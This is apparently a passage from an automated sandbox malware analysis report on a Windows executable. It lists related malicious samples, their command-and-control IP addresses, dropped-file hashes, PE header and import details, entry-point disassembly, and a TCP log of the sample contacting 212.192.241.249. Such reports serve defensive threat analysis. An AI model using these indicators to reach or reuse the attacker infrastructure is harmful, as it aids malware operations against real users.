            oSI9rf0h2U.exeGet hashmaliciousBrowse
            • 8.209.115.161
            iP1ZMsVOo6.exeGet hashmaliciousBrowse
            • 8.209.115.161
            jyM8NR8QU7.exeGet hashmaliciousBrowse
            • 8.209.115.161
            VBELHQLOAs.exeGet hashmaliciousBrowse
            • 8.209.115.161
            ZrAv540yA4.exeGet hashmaliciousBrowse
            • 47.254.33.79
            6Xtf11WnP2.exeGet hashmaliciousBrowse
            • 47.254.33.79
            M9WBCy4NNi.exeGet hashmaliciousBrowse
            • 47.254.33.79
            wj1j21cmxi.exeGet hashmaliciousBrowse
            • 47.254.33.79
            Y5EGM7BygT.exeGet hashmaliciousBrowse
            • 47.254.33.79
            BVxT3jA2K0.exeGet hashmaliciousBrowse
            • 47.254.33.79
            yeLdmaW3oj.exeGet hashmaliciousBrowse
            • 47.254.33.79
            7WXfPYaWt2.exeGet hashmaliciousBrowse
            • 47.254.33.79
            7u0Gj7aYfG.exeGet hashmaliciousBrowse
            • 47.254.33.79
            xacokuo80.topyH8giB6jJ2.exeGet hashmaliciousBrowse
            • 212.192.241.249
            AO7gki3UTr.exeGet hashmaliciousBrowse
            • 47.254.176.217
            J73PTzDghy.exeGet hashmaliciousBrowse
            • 212.193.50.242
            Fm9bT1UlKI.exeGet hashmaliciousBrowse
            • 8.209.115.161
            daleUmOAcZ.exeGet hashmaliciousBrowse
            • 8.209.115.161
            lAx2rypDqG.exeGet hashmaliciousBrowse
            • 8.209.115.161
            oSI9rf0h2U.exeGet hashmaliciousBrowse
            • 8.209.115.161
            iP1ZMsVOo6.exeGet hashmaliciousBrowse
            • 8.209.115.161
            VBELHQLOAs.exeGet hashmaliciousBrowse
            • 8.209.115.161

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            RAPMSB-ASRUQSUoGqi867.exeGet hashmaliciousBrowse
            • 212.192.241.70
            8p2NlqFgew.exeGet hashmaliciousBrowse
            • 212.192.241.70
            QSUoGqi867.exeGet hashmaliciousBrowse
            • 212.192.241.70
            ttY1E1yC3m.exeGet hashmaliciousBrowse
            • 212.192.241.249
            EUMeloHpr7.exeGet hashmaliciousBrowse
            • 212.192.241.249
            yH8giB6jJ2.exeGet hashmaliciousBrowse
            • 212.192.241.249
            mN2NobuuDv.exeGet hashmaliciousBrowse
            • 212.192.241.175
            OPKyR75fJn.exeGet hashmaliciousBrowse
            • 212.192.241.70
            3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exeGet hashmaliciousBrowse
            • 212.192.241.70
            23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exeGet hashmaliciousBrowse
            • 212.192.241.70
            Purchase-Order433423.exeGet hashmaliciousBrowse
            • 212.192.241.222
            HTJ.exeGet hashmaliciousBrowse
            • 212.192.241.221
            5AHyELsVLZ.exeGet hashmaliciousBrowse
            • 212.192.241.15
            1B0DAF8B1B8A09AE26A72E30FA638B000A991A7DFAF7C.exeGet hashmaliciousBrowse
            • 212.192.241.15
            8F9CDF75C272FDA7DF367232756EA065600077804B165.exeGet hashmaliciousBrowse
            • 212.192.241.15
            33CBD9E39DD39A84D0426897605B17000046E0FB14399.exeGet hashmaliciousBrowse
            • 212.192.241.15
            setup_x86_x64_install.exeGet hashmaliciousBrowse
            • 212.192.241.15
            iCm814vnxp.exeGet hashmaliciousBrowse
            • 212.192.241.15
            0A223AA68AF0C2AF0BAABDA61D82748629078720A017E.exeGet hashmaliciousBrowse
            • 212.192.241.15
            951049989EB772C71EC4FA9F0685AB45CAE755CA5D34C.exeGet hashmaliciousBrowse
            • 212.192.241.15

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\D380.exe
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:modified
            Size (bytes):302592
            Entropy (8bit):5.813051493235412
            Encrypted:false
            SSDEEP:6144:8eWWd3GjRD8vAZvXJSXuZet0yS8Y48PGvx/6h:o63GwAZPJSXuZet0yS8YYvx/
            MD5:61BA8F1EDCD03481D6447E8EC34DC383
            SHA1:70B3702ECBCF7FF81C9C93CAAA5C1220DDCE0931
            SHA-256:C1233AC55E45B60D50326C3E3380DA5A7F5EA83ED5E9E93EB99D0DEC01E5004F
            SHA-512:6AE1F2501094CE91205945665726317E3E18116684D2975C9C5C575519D33E00B4E3A0BA1C5329BC7F34819A736CEFFEC75DCE383EF8C7A798F93886F11073E7
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...p...p..Sp...p..fp...p..ap...pRich...p........PE..L...*}._......................|..... |....... ....@.................................k,..........................................x....p~..g....................~..... ...............................Hz..@............................................text...(........................... ..`.data....A{.. ......................@....rsrc....g...p~..h... ..............@..@.reloc........~.....................@..B................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\gahfeaj
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):304128
            Entropy (8bit):5.823579577144565
            Encrypted:false
            SSDEEP:6144:QSzvF8GFy9eGzktM61i2hIaVSXuZet0yy8Eo10gytXunKdi:7zg93zH2h7VSXuZet0yy8E2yt/d
            MD5:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            SHA1:AFAF20C658C307F53E804639710C2DCE09E9C3BA
            SHA-256:5231916FBEB9C166A9BBB4E7C576B210019A3A84C17CBE777CB099AB3AAD5DD8
            SHA-512:B94F6706AC60C695C5CB38897381A062BF20801568EE0A12BCDF14BC8FC0340BDC5F29CFDDCB922958C5E6631DE085D7B3C5B98CD79A2ABA6AA2B3DB9634C094
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...[S;`......................|..... ........ ....@.................................j...........................................x....p~..h....................~.....................................P...@............................................text............................... ..`.data....A{.. ......................@....rsrc....h...p~..j...$..............@..@.reloc..<.....~.....................@..B................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier
            Process:C:\Windows\explorer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Reputation:high, very likely benign file
            Preview: [ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.823579577144565
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:qhQ6armJ25.exe
            File size:304128
            MD5:9953acb0fee6c45fc5aa12d21ac3ad1b
            SHA1:afaf20c658c307f53e804639710c2dce09e9c3ba
            SHA256:5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
            SHA512:b94f6706ac60c695c5cb38897381a062bf20801568ee0a12bcdf14bc8fc0340bdc5f29cfddcb922958c5e6631de085d7b3c5b98cd79a2aba6aa2b3db9634c094
            SSDEEP:6144:QSzvF8GFy9eGzktM61i2hIaVSXuZet0yy8Eo10gytXunKdi:7zg93zH2h7VSXuZet0yy8E2yt/d
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...[S;`...................

            File Icon

            Icon Hash:b2e8e8e8a2a2a488

            Static PE Info

            General

            Entrypoint:0x418120
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
            Time Stamp:0x603B535B [Sun Feb 28 08:24:59 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:ee6524c22cc0cf74d4c47508c44cd3e2

            Entrypoint Preview

            Instruction
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F537CE15AEBh
            call 00007F537CE157F6h
            pop ebp
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov edi, edi
            push ebp
            mov ebp, esp
            push FFFFFFFEh
            push 0042FDE0h
            push 0041C340h
            mov eax, dword ptr fs:[00000000h]
            push eax
            add esp, FFFFFF98h
            push ebx
            push esi
            push edi
            mov eax, dword ptr [00432064h]
            xor dword ptr [ebp-08h], eax
            xor eax, ebp
            push eax
            lea eax, dword ptr [ebp-10h]
            mov dword ptr fs:[00000000h], eax
            mov dword ptr [ebp-18h], esp
            mov dword ptr [ebp-70h], 00000000h
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [00401314h]
            cmp dword ptr [01BE51BCh], 00000000h
            jne 00007F537CE157F0h
            push 00000000h
            push 00000000h
            push 00000001h
            push 00000000h
            call dword ptr [00401310h]
            call 00007F537CE15973h
            mov dword ptr [ebp-6Ch], eax
            call 00007F537CE1993Bh
            test eax, eax
            jne 00007F537CE157ECh
            push 0000001Ch
            call 00007F537CE15930h
            add esp, 04h
            call 00007F537CE19298h
            test eax, eax
            jne 00007F537CE157ECh
            push 00000010h
            call 00007F537CE1591Dh
            add esp, 04h
            push 00000001h
            call 00007F537CE191E3h
            add esp, 04h
            call 00007F537CE16E9Bh
            mov dword ptr [ebp-04h], 00000000h
            call 00007F537CE16A7Fh
            test eax, eax

            Rich Headers

            Programming Language:
            • [LNK] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x303c40x78.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x17e70000x68b0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x17ee0000x17cc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x1c.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x17f500x40.text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x3c4.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x30ae20x30c00False0.609615384615data7.04028491917IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x320000x17b41c00x1400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x17e70000x68b00x6a00False0.529407429245data5.46609013529IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x17ee0000x1143c0x11600False0.0750196717626data0.974071358106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            AFX_DIALOG_LAYOUT0x17eb8200x2dataDivehi; Dhivehi; MaldivianMaldives
            YONAMIKORUFENI0x17ea8c00xee8ASCII text, with very long lines, with no line terminatorsSpanishPanama
            RT_CURSOR0x17eb8280x130dataDivehi; Dhivehi; MaldivianMaldives
            RT_CURSOR0x17eb9580xf0dataDivehi; Dhivehi; MaldivianMaldives
            RT_CURSOR0x17eba480x10a8dBase III DBT, version number 0, next free block index 40Divehi; Dhivehi; MaldivianMaldives
            RT_ICON0x17e74f00x8a8dataSpanishPanama
            RT_ICON0x17e7d980x6c8dataSpanishPanama
            RT_ICON0x17e84600x568GLS_BINARY_LSB_FIRSTSpanishPanama
            RT_ICON0x17e89c80x10a8dataSpanishPanama
            RT_ICON0x17e9a700x988dataSpanishPanama
            RT_ICON0x17ea3f80x468GLS_BINARY_LSB_FIRSTSpanishPanama
            RT_STRING0x17ecc500xfcdataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x17ecd500x252dataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x17ecfa80x458dataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x17ed4000x25cdataDivehi; Dhivehi; MaldivianMaldives
            RT_STRING0x17ed6600x24adataDivehi; Dhivehi; MaldivianMaldives
            RT_ACCELERATOR0x17eb7a80x78dataDivehi; Dhivehi; MaldivianMaldives
            RT_GROUP_CURSOR0x17ecaf00x30dataDivehi; Dhivehi; MaldivianMaldives
            RT_GROUP_ICON0x17ea8600x5adataSpanishPanama
            RT_VERSION0x17ecb200x12cdataDivehi; Dhivehi; MaldivianMaldives

            Imports

            DLLImport
            KERNEL32.dllUnregisterWait, SetCriticalSectionSpinCount, HeapCompact, lstrcmpA, FindFirstFileW, FindFirstChangeNotificationW, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, CreateJobObjectW, GlobalLock, AddConsoleAliasW, SetVolumeMountPointW, GetComputerNameW, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, CreateNamedPipeW, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, CreateActCtxW, WaitForMultipleObjectsEx, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, FatalAppExitW, GetThreadSelectorEntry, GetCalendarInfoW, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, GetSystemWindowsDirectoryA, ReadConsoleOutputW, SetConsoleCP, DeleteVolumeMountPointW, InterlockedPopEntrySList, GetFileAttributesA, lstrcpynW, SetConsoleMode, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, TerminateProcess, GetAtomNameW, IsDBCSLeadByte, GetModuleFileNameW, lstrcatA, QueryInformationJobObject, GetBinaryTypeW, GetVolumePathNameA, lstrlenW, GetPrivateProfileSectionNamesW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, VerifyVersionInfoW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, FreeLibraryAndExitThread, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, GetLongPathNameA, HeapSize, CreateJobSet, LocalLock, LockFileEx, EnterCriticalSection, VerLanguageNameW, SearchPathA, BuildCommDCBW, FindClose, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, LocalAlloc, MoveFileA, BuildCommDCBAndTimeoutsW, GetExitCodeThread, GetNumberFormatW, SetCurrentDirectoryW, SetFileApisToANSI, QueryDosDeviceW, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, SetNamedPipeHandleState, SetEnvironmentVariableA, GetVolumePathNamesForVolumeNameA, GetDefaultCommConfigA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, FindNextFileW, WriteProfileStringW, VirtualProtect, EnumDateFormatsW, CompareStringA, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CopyFileExA, LocalFileTimeToFileTime, CreateFileW, SetStdHandle, GetFullPathNameA, GetThreadContext, WritePrivateProfileStringW, ExitProcess, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, HeapValidate, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, LeaveCriticalSection, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers
            USER32.dllGetMessageTime
            GDI32.dllGetBitmapBits
            ADVAPI32.dllGetFileSecurityW
            MSIMG32.dllAlphaBlend

            Version Infos

            DescriptionData
            Translations0x0022 0x023c

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            Divehi; Dhivehi; MaldivianMaldives
            SpanishPanama

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Nov 25, 2021 18:24:50.037879944 CET4971480192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.065604925 CET8049714212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.065758944 CET4971480192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.066019058 CET4971480192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.066059113 CET4971480192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.093697071 CET8049714212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.207442999 CET8049714212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.207555056 CET4971480192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.208436966 CET4971480192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.235953093 CET8049714212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.260036945 CET4971580192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.287899017 CET8049715212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.288031101 CET4971580192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.288214922 CET4971580192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.288240910 CET4971580192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.428165913 CET8049715212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.428299904 CET4971580192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.428689957 CET4971580192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.456434965 CET8049715212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.767328024 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.795320988 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.799561977 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.799880028 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.870975971 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919018984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919063091 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919090033 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919117928 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919147968 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919151068 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.919182062 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919210911 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919230938 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.919248104 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919251919 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.919274092 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919300079 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.919302940 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.919450045 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.947226048 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.961850882 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.961916924 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.961945057 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.961956978 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.961996078 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.962018967 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.962035894 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.962049007 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.962078094 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.962095022 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.962119102 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.962127924 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.962208033 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.989969015 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.990011930 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.990041018 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.990052938 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:50.990087032 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:50.990113020 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.017946959 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.018009901 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.018052101 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.018093109 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.018120050 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.018157959 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.018162966 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.018167973 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.045954943 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.046006918 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.046047926 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.046087027 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.046101093 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.046125889 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.046128035 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.046200991 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.074820042 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.074863911 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.074948072 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.074954033 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.074997902 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.075036049 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.075062037 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.075074911 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.075099945 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.075136900 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.075145006 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.103456020 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.103501081 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.103538990 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.103579044 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.103598118 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.103679895 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.131496906 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.131546021 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.131656885 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.159498930 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.159579039 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.159650087 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.159760952 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.187458038 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.187613010 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.187735081 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.189636946 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.217515945 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.217581034 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.217709064 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.221803904 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.245457888 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.249753952 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.249970913 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.277760029 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.277798891 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.278006077 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.379056931 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.381699085 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.409660101 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.409914017 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.437843084 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.437869072 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.438057899 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.465949059 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.466016054 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.466161966 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.494040966 CET8049716212.192.241.249192.168.2.4
